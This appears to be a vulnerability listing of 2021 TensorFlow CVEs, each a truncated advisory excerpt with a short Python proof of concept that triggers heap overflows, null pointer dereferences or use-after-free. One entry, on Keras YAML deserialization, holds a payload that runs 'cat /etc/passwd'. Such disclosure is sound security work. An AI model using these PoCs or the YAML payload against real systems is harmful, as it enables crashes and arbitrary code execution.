Intel Optimization For Tensorflow vulnerabilities

CVE-2021-41216 [MEDIUM] CWE-120 Heap buffer overflow in `Transpose` Heap buffer overflow in `Transpose` ### Impact The [shape inference function for `Transpose`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc#L121-L185) is vulnerable to a heap buffer overflow: ```python import tensorflow as tf @tf.function def test(): y = tf.raw_ops.Transpose(x=[1,2,3,4],perm=[-10]) return y test() ``` This occurs whenever `perm` contai

CVE-2021-41205 [MEDIUM] CWE-125 Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops ### Impact The [shape inference functions for the `QuantizeAndDequantizeV*` operations](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc) can trigger a read outside of bounds of heap allocated array as illustrated in the following sets of PoCs: ```python import tensorflo

CVE-2021-41225 [MEDIUM] CWE-908 A use of uninitialized value vulnerability in Tensorflow A use of uninitialized value vulnerability in Tensorflow ### Impact TensorFlow's Grappler optimizer has a [use of unitialized variable](https://github.com/tensorflow/tensorflow/blob/3457a2b122e50b4d44ceaaed5a663d635e5c22df/tensorflow/core/grappler/optimizers/auto_parallel.cc#L155-L164): ```cc const NodeDef* dequeue_node; for (const auto& train_node : train_nodes) { if (IsDequeueOp(*train_node)) { dequeue_n

CVE-2021-37689 [HIGH] CWE-476 Null pointer dereference in TFLite MLIR optimizations Null pointer dereference in TFLite MLIR optimizations ### Impact An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: This is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/li

CVE-2021-37651 [HIGH] CWE-125 Heap buffer overflow in `FractionalAvgPoolGrad` Heap buffer overflow in `FractionalAvgPoolGrad` ### Impact The implementation for `tf.raw_ops.FractionalAvgPoolGrad` can be tricked into accessing data outside of bounds of heap allocated buffers: ```python import tensorflow as tf tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=[0,1,2,3], out_backprop = np.array([[[[541],[541]],[[541],[541]]]]), row_pooling_sequence=[0, 0, 0, 0, 0], col_pooling_sequence=[-

CVE-2021-37664 [HIGH] CWE-125 Heap OOB in boosted trees Heap OOB in boosted trees ### Impact An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `BoostedTreesSparseCalculateBestFeatureSplit`: ```python import tensorflow as tf tf.raw_ops.BoostedTreesSparseCalculateBestFeatureSplit( node_id_range=[0,10], stats_summary_indices=[[1, 2, 3, 0x1000000]], stats_summary_values=[1.0], stats_summary_shape=[1,1,1,1], l1=l2=[1.0], tree_compl

CVE-2021-37681 [HIGH] CWE-476 NPE in TFLite NPE in TFLite ### Impact The implementation of SVDF in TFLite is [vulnerable to a null pointer error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/svdf.cc#L300-L313): ```cc TfLiteTensor* state = GetVariableInput(context, node, kStateTensor); // ... GetTensorData(state) ``` The [`GetVariableInput` function](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b19

CVE-2021-37650 [HIGH] CWE-120 Segfault and heap buffer overflow in `{Experimental,}DatasetToTFRecord` Segfault and heap buffer overflow in `{Experimental,}DatasetToTFRecord` ### Impact The implementation for `tf.raw_ops.ExperimentalDatasetToTFRecord` and `tf.raw_ops.DatasetToTFRecord` can trigger heap buffer overflow and segmentation fault: ```python import tensorflow as tf dataset = tf.data.Dataset.range(3) dataset = tf.data.experimental.to_variant(dataset) tf.raw_ops.ExperimentalDatasetToTF

CVE-2021-37676 [HIGH] CWE-824 Reference binding to nullptr in shape inference Reference binding to nullptr in shape inference ### Impact An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.SparseFillEmptyRows`: ```python import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.SparseFillEmptyRows( indices = tf.constant([], shape=[0, 0], dtype=tf.int64), values = tf.constant([], shape=[0], dtype=tf.int64), dense_shape = tf.constant([], s

CVE-2021-37652 [HIGH] CWE-415 Use after free in boosted trees creation Use after free in boosted trees creation ### Impact The implementation for `tf.raw_ops.BoostedTreesCreateEnsemble` can result in a use after free error if an attacker supplies specially crafted arguments: ```python import tensorflow as tf v= tf.Variable([0.0]) tf.raw_ops.BoostedTreesCreateEnsemble( tree_ensemble_handle=v.handle, stamp_token=[0], tree_ensemble_serialized=['0']) ``` The [implementation](https://github.com/t

CVE-2021-37649 [HIGH] CWE-476 Null pointer dereference in `UncompressElement` Null pointer dereference in `UncompressElement` ### Impact The code for `tf.raw_ops.UncompressElement` can be made to trigger a null pointer dereference: ```python import tensorflow as tf data = tf.data.Dataset.from_tensors([0.0]) tf.raw_ops.UncompressElement( compressed=tf.data.experimental.to_variant(data), output_types=[tf.int64], output_shapes=[2]) ``` The [implementation](https://github.com/tensorflow/tensorfl

CVE-2021-37678 [HIGH] CWE-502 Arbitrary code execution due to YAML deserialization Arbitrary code execution due to YAML deserialization ### Impact TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. ```python from tensorflow.keras import models payload = ''' !!python/object/new:type args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] listitems: "__import__('os').system('cat /etc/passwd')" ''' models.model_from

CVE-2021-37638 [HIGH] CWE-476 Null pointer dereference in `RaggedTensorToTensor` Null pointer dereference in `RaggedTensorToTensor` ### Impact Sending invalid argument for `row_partition_types` of `tf.raw_ops.RaggedTensorToTensor` API results in a null pointer dereference and undefined behavior: ```python import tensorflow as tf tf.raw_ops.RaggedTensorToTensor( shape=1, values=10, default_value=21, row_partition_tensors=tf.constant([0,0,0,0]), row_partition_types=[]) ``` The [implementation]

CVE-2021-37665 [HIGH] CWE-20 Incomplete validation in MKL requantization Incomplete validation in MKL requantization ### Impact Due to incomplete validation in MKL implementation of requantization, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: ```python import tensorflow as tf tf.raw_ops.RequantizationRangePerChannel( input=[], input_min=[0,0,0,0,0], input_max=[1,1,1,1,1], clip_value_max=1)

CVE-2021-37688 [HIGH] CWE-476 Null pointer dereference in TFLite Null pointer dereference in TFLite ### Impact An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: ```python import tensorflow as tf model = tf.keras.models.Sequential() model.add(tf.keras.Input(shape=(1, 2, 3))) model.add(tf.keras.layers.Dense(0, activation='relu')) converter = tf.lite.TFLiteConverter.from_keras_model(model) tflite_model = conv

CVE-2021-37643 [HIGH] CWE-476 Null pointer dereference in `MatrixDiagPartOp` Null pointer dereference in `MatrixDiagPartOp` ### Impact If a user does not provide a valid padding value to `tf.raw_ops.MatrixDiagPartOp`, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first: ```python import tensorflow as tf tf.raw_ops.MatrixDiagPartV2( input=tf.ones(2,dtype=tf.int32), k=tf.ones(2,dtype=tf.int32), padding_value=[])

CVE-2021-37671 [HIGH] CWE-824 Reference binding to nullptr in map operations Reference binding to nullptr in map operations ### Impact An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.Map*` and `tf.raw_ops.OrderedMap*` operations: ```python import tensorflow as tf tf.raw_ops.MapPeek( key=tf.constant([8],dtype=tf.int64), indices=[], dtypes=[tf.int32], capacity=8, memory_limit=128) ``` The [implementation](https://github.com/tensorflow/tensorflow/

CVE-2021-37639 [HIGH] CWE-125 Null pointer dereference and heap OOB read in operations restoring tensors Null pointer dereference and heap OOB read in operations restoring tensors ### Impact When restoring tensors via raw APIs, if the tensor name is not provided, TensorFlow can be tricked into dereferencing a null pointer: ```python import tensorflow as tf tf.raw_ops.Restore( file_pattern=['/tmp'], tensor_name=[], default_value=21, dt=tf.int, preferred_shard=1) ``` The same undefined behavio

CVE-2021-37648 [HIGH] CWE-476 Incorrect validation of `SaveV2` inputs Incorrect validation of `SaveV2` inputs ### Impact The code for `tf.raw_ops.SaveV2` does not properly validate the inputs and an attacker can trigger a null pointer dereference: ```python import tensorflow as tf tf.raw_ops.SaveV2( prefix=['tensorflow'], tensor_name=['v'], shape_and_slices=[], tensors=[1,2,3]) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/ten

CVE-2021-37654 [HIGH] CWE-125 Heap OOB and CHECK fail in `ResourceGather` Heap OOB and CHECK fail in `ResourceGather` ### Impact An attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build: ```python import tensorflow as tf tensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather(